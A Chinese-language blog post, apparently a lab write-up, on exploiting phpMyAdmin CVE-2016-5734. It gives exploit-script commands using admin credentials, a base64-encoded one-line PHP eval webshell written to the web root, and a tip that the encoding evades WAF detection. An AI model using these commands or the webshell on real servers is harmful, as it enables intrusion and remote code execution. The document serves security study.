phpmyadmin RCE (CVE-2016-5734)

 phpmyadmin RCE(CVE-2016-5734)

前言 : 

我記得筆者一年前也有寫過 phpmyadmin LFI to RCE 的文章,這次是比較舊版本的漏洞,都學起來就對惹 XD 通常在打 phpmyadmin 首先要進入後台才比較有利用空間,實戰中有看過利用 ./git 洩漏找出帳號密碼登進去過,倒還是挺好玩的。

內文 : 

影響範圍

4.0.10.16 之前 4.0.x 版本

4.4.15.7 之前 4.4.x 版本

4.6.3 之前 4.6.x 版本 

前提 :
需要知道 phpmyadmin 後台帳號密碼
python3 CVE-2016-5734.py -u root -p root -d test http://192.168.235.128:8080/ -c "system('id');"

 -c 指的是執行 php 指令,可以採一種函式叫做 file_put_contents,可以寫個木馬字串去生成新的檔案,相關函式解析,於是筆者是採用這個函式繼續接下來的利用,在執行前筆者會先確認目前所在的位置,最好的方式就是寫在根目錄底下。

python3  CVE-2016-5734.py -u root -p root http://192.168.235.128:8080/ -c "file_put_contents('noth.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"  

筆者繼續把一句話木馬進行 base64encode , 再 decode 回去,單純寫一句話木馬可能會被 WAF 偵測到。

直接訪問根目錄下的 noth.php,查看是否增加木馬檔案。
http://192.168.235.128:8080/noth.php

成功利用 Post 方式進行 RCE。
 
 
因為筆者本身也不是本科出生,有時看代碼會覺得挺生疏的,筆者之後可能回頭過來再去練習代碼審計的部份,雖然本身已經有 CVE ID,但筆者還是想去挖一點高危漏洞,最好是 SQL Injection 或 RCE,雖然在挖洞的時候會花很多時間,不過也算是有成就感吧(?

Reference : 
https://github.com/vulhub/vulhub/blob/master/phpmyadmin/CVE-2016-5734/README.zh-cn.md
https://www.exploit-db.com/exploits/40185/ 

留言

熱門文章